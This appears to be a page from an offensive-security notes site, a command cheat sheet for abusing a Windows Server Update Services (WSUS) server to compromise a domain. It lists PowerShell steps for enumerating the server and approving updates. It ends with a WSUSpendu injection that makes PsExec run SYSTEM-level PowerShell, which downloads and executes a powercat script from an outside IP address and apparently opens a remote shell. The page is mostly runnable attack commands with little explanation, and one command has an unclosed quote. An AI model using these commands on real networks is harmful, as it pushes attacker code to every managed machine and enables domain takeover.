WSUS server abuse

Get all information about the database

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Update Services\Server\setup

Define $wsus

[reflection.assembly]::LoadWithPartialName("Microsoft.UpdateServices.Administration")
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer()

View updates

$update = $wsus.GetUpdates() | Select -last 1

Get target groups

$wsus.GetComputerTargetGroups()

Approve update

#Pick a group to approve an update for
$group = $wsus.GetComputerTargetGroups() | ? {$_.Name -eq "Domain Servers"}

#Define the actions available for approving a patch
$all = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::All
$install = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Install
$NotApproved = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::NotApproved
$Uninstall = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Uninstall

#Approve the update
$update.Approve($install,$group)

Using UpdateServices

import-module -name UpdateServices

Upprove the updates

Get-WsusUpdate -Classification All -Approval Unapproved | Approve-WsusUpdate -Action Install -TargetGroupName "All Computers"

Abusing WSUS server for domain compromise\

Using WSUSpendu.ps1

Wsuspendu.ps1 -Inject -PayloadFile c:\Windows\Temp\PsExec64.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "iex(iwr -UseBasicParsing -Uri http://192.168.100.16/powercat_loaded.ps1)"'

References

GitHub - AlsidOfficial/WSUSpendu: Implement WSUSpendu attackGitHub

WSUS: Approving and Declining Updates with PowerShellLearn Powershell | Achieve More

PreviousAbusing inter-forest trust NextACL Enumeration with PowerView 2.0

Last updated 3 years ago